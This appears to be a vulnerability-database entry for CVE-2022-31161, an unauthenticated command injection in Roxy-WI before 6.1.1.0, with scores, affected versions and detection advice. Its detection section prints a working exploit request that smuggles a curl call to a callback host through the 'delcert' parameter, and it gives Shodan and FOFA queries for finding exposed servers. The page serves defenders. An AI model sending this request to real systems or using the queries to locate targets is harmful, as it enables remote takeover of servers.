cbcvebase.
CVE-2022-31161
published 2022-07-15

CVE-2022-31161: Roxy-WI is a Web interface for managing HAProxy, Nginx and Keepalived servers. Prior to version 6.1.1.0, the system command can be run remotely via the…

PriorityP184critical9.8CVSS 3.1
AVNACLPRNUINSUCHIHAH
ITWEXPLOITVulnCheck KEV
Exploited in the wild
EPSS
20.45%
97.2th percentile
Roxy-WI is a Web interface for managing HAProxy, Nginx and Keepalived servers. Prior to version 6.1.1.0, the system command can be run remotely via the subprocess_execute function without processing the inputs received from the user in the /app/options.py file. Version 6.1.1.0 contains a patch for this issue.

Affected

2 ranges
VendorProductVersion rangeFixed in
hap-wiroxy-wi< 6.1.1.06.1.1.0
roxy-wiroxy-wi< 6.1.1.06.1.1.0

Detection & IOCsextracted from sources · hover to see the quote

url/app/options.py
commandPOST /app/options.py HTTP/1.1
othershow_versions=1&token=&alert_consumer=notNull&serv=127.0.0.1&delcert=a%20&%20curl%20{{interactsh-url}};
  • Monitor for POST requests to /app/options.py containing the 'delcert' parameter with shell metacharacters (e.g., %20&%20, semicolons) indicating OS command injection attempts.
  • Detect unauthenticated POST requests to /app/options.py — the exploit requires no authentication (token= is empty), making unauthenticated access to this endpoint a strong signal.
  • Use Shodan/FOFA queries to identify exposed Roxy-WI instances: Shodan query 'html:"Roxy-WI"' and FOFA query 'body="roxy-wi"'.
  • Look for outbound curl requests originating from the web server process shortly after a POST to /app/options.py, as the payload injects a curl command via the delcert parameter.
  • ·The vulnerability exists in Roxy-WI versions prior to 6.1.1.0 only; version 6.1.1.0 contains the patch. Ensure version checks are part of triage.
  • ·The exploit is unauthenticated (empty token field), meaning no credentials are required to trigger RCE — detection rules should not filter on authentication state.

CVSS provenance

nvdv3.19.8CRITICALCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
vulncheck10.0CRITICAL
CVEs like this are exactly what “Exploited This Week” covers.

Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.